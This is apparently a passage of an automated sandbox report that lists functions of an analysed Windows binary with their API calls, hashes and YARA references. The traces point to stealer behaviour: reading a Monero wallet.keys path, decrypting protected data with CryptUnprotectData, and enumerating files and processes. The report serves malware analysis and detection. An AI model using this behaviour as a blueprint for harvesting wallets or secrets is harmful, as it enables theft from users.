                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 7ys|$CCk~$FCb$Z^Wm$nmmw$qEt$7}$?e
                              • API String ID: 0-791327716
                              • Opcode ID: 0c4eb566d9e3aa06898df657b0d8f6aedf91c9d9464b1b3cc9e9e77677731155
                              • Instruction ID: 9883fe80a71cefc74388d2fb26f2a73dc7196e6682d4bd575437a7cdc81fd083
                              • Opcode Fuzzy Hash: 0c4eb566d9e3aa06898df657b0d8f6aedf91c9d9464b1b3cc9e9e77677731155
                              • Instruction Fuzzy Hash: 87B206F360C6049FE3046E29EC8567ABBE5EF94320F1A493DE6C4C3744EA3598458797
                              Function 00DF7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,00E005AF), ref: 00DF7BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00DF7BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00DF7C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00DF7C62
                              • LocalFree.KERNEL32(00000000), ref: 00DF7D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: b85ac848b95977d513241d4f7451bcadcf875c15a970c6b14db788865b816ff8
                              • Instruction ID: 5ff2c62651b2ca0c4b25a15d98b4051dc65737e443f8cb79dc67fbd5bd35ae9b
                              • Opcode Fuzzy Hash: b85ac848b95977d513241d4f7451bcadcf875c15a970c6b14db788865b816ff8
                              • Instruction Fuzzy Hash: 994107B194021CABDB24DB94DC99BFEB378EB48700F608199E60966181DB746B85CFB1
                              Function 011BEDDE Relevance: 10.4, Strings: 7, Instructions: 1631COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: `?$17o$F*-$La;s$V~|w$oQz{$'w
                              • API String ID: 0-735723939
                              • Opcode ID: 567f0003459ef02064d192024c3a443fe9a54b48af84db0cc2e4d20c8aa98484
                              • Instruction ID: 25a8084af53eba45225e9d8f1c0c307c4b83a359f271079635c78239beefd961
                              • Opcode Fuzzy Hash: 567f0003459ef02064d192024c3a443fe9a54b48af84db0cc2e4d20c8aa98484
                              • Instruction Fuzzy Hash: ADB2F9F3A082149FE304AE2DEC8567ABBE9EFD4720F16493DEAC4C3744E63558058697
                              Function 011B822D Relevance: 10.4, Strings: 7, Instructions: 1623COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: %pwO$<:{=$n,m$z,^$zxg-$~Nuy$kt?
                              • API String ID: 0-1752472852
                              • Opcode ID: b84d34ea780463bbf5a91c8c3227d56d3096389f4c55b716fa4731bd830c5628
                              • Instruction ID: 0c2f89870d538877dceb27debc37c650ccaf5e3be9b3a334c0fbe8e448cfc2b1
                              • Opcode Fuzzy Hash: b84d34ea780463bbf5a91c8c3227d56d3096389f4c55b716fa4731bd830c5628
                              • Instruction Fuzzy Hash: 6BB2C3F3A0C6049FE304AE29EC8567ABBE5EF94320F16493DE6C5C7744EA3558018797
                              Function 011C45C1 Relevance: 9.8, Strings: 7, Instructions: 1026COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !k~k$#2_{$>a.}$^6~s$`_{$j8($:y=
                              • API String ID: 0-3345155403
                              • Opcode ID: 0c3e68b60a9fdc7890f218b84cf92aff5b95b42087fae72ca3c854f81fafb1a8
                              • Instruction ID: fc3fe1cb7ac48f4016502c25ffbfcd97545e9a5e45959914f2dc0d019348b39a
                              • Opcode Fuzzy Hash: 0c3e68b60a9fdc7890f218b84cf92aff5b95b42087fae72ca3c854f81fafb1a8
                              • Instruction Fuzzy Hash: 296249F3A0C214AFE7046E2DEC8567ABBE5EF94760F16463DEAC487740EA3558008697
                              Function 00DEE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00E00D73), ref: 00DEE4A2
                              • StrCmpCA.SHLWAPI(?,00E014F8), ref: 00DEE4F2
                              • StrCmpCA.SHLWAPI(?,00E014FC), ref: 00DEE508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEEBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: c9ce18ac407776b0b88ef266df6fed489a8996fb92b6c907bd87355761a7e32c
                              • Instruction ID: c8a306f545c0627d4858a1e959737d8f06df58c655d5643fabb837b88901136b
                              • Opcode Fuzzy Hash: c9ce18ac407776b0b88ef266df6fed489a8996fb92b6c907bd87355761a7e32c
                              • Instruction Fuzzy Hash: 66123BB190011C9ADB24FB64DC96EFD7338EF54340F4181A9B60EA6095EE746B49CFB2
                              Function 011B315F Relevance: 9.1, Strings: 6, Instructions: 1649COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !i_8$3/e*$7,=$:!?$W<7z$[Ljk
                              • API String ID: 0-1638412300
                              • Opcode ID: 383e1df74c11514421d83ce86e43e434699aa82567eaa59a1d2129509477aa9e
                              • Instruction ID: 2b3bf4ae676dad9873af0e63d2ef4ad95a38b62bf73b3587bb7a2c0e9c6211d7
                              • Opcode Fuzzy Hash: 383e1df74c11514421d83ce86e43e434699aa82567eaa59a1d2129509477aa9e
                              • Instruction Fuzzy Hash: 01B2F7F36082049FE3046E2DEC8567AF7EAEFD4720F1A893DE6C4C7744EA3558058696
                              Function 011BB841 Relevance: 9.1, Strings: 6, Instructions: 1601COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: O?=$c=w}$kc{~$kc{~$rv$|A;
                              • API String ID: 0-525553454
                              • Opcode ID: d87708193fc0b89188b07211a93aeba6c571e0b60e4549c9564638821c74833e
                              • Instruction ID: cfa2d5b59468eeadfdded1c34e205f8fd974eee702524a45ca3e95f4f260d0be
                              • Opcode Fuzzy Hash: d87708193fc0b89188b07211a93aeba6c571e0b60e4549c9564638821c74833e
                              • Instruction Fuzzy Hash: BEB206B360C6009FE304AE29EC8567AFBE5EF94320F1A893DE6C4C7744EA3558418797
                              Function 011C7402 Relevance: 7.9, Strings: 5, Instructions: 1635COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: /!ow$23mK$48`$kO~{$]6
                              • API String ID: 0-1159922982
                              • Opcode ID: 7de99604efa2138a4cd239fc8f3441896c4b76cdd7afb6958181b814011f26c5
                              • Instruction ID: 05d513f16de10ca2d9bdeec6d1bc477f0c23a903de6a62ce34105c97673c4ca0
                              • Opcode Fuzzy Hash: 7de99604efa2138a4cd239fc8f3441896c4b76cdd7afb6958181b814011f26c5
                              • Instruction Fuzzy Hash: 64B23AF36082109FE3046E2DEC8577ABBE9EF94720F1A4A3DE6C4C7744E63598058697
                              Function 00DEC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00DEC871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00DEC87C
                              • lstrcat.KERNEL32(?,00E00B46), ref: 00DEC943
                              • lstrcat.KERNEL32(?,00E00B47), ref: 00DEC957
                              • lstrcat.KERNEL32(?,00E00B4E), ref: 00DEC978
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 40b5fe5455fc1a712f816a39406f33b0e47660b50770272ce3f861e09ecc728f
                              • Instruction ID: 0dfc59717693aa6176bf8d36716ca9345a1539056e801ac0f0d8f136926c70b6
                              • Opcode Fuzzy Hash: 40b5fe5455fc1a712f816a39406f33b0e47660b50770272ce3f861e09ecc728f
                              • Instruction Fuzzy Hash: A941717591420ADBCB20DFA0DC89BFEB7B8BB48304F1041A8E509A7280DB755A85CFA1
                              Function 00DE7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00DE724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DE7254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00DE7281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00DE72A4
                              • LocalFree.KERNEL32(?), ref: 00DE72AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 8ce67f5b61f15a5dc51015d943f0cf7a96cca05d0b01a3d8dfc655d9421ed823
                              • Instruction ID: 33bb99ee4e886afd660ec7bde863d216a36ec9f997a22fbe7675c9317f4bfcb4
                              • Opcode Fuzzy Hash: 8ce67f5b61f15a5dc51015d943f0cf7a96cca05d0b01a3d8dfc655d9421ed823
                              • Instruction Fuzzy Hash: 62014075B40208FBDB20DFD4CD46F9E7778AB44700F204055FB05AB2C4CAB5AA008B64
                              Function 00DF9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00DF961E
                              • Process32First.KERNEL32(00E00ACA,00000128), ref: 00DF9632
                              • Process32Next.KERNEL32(00E00ACA,00000128), ref: 00DF9647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 00DF965C
                              • CloseHandle.KERNEL32(00E00ACA), ref: 00DF967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
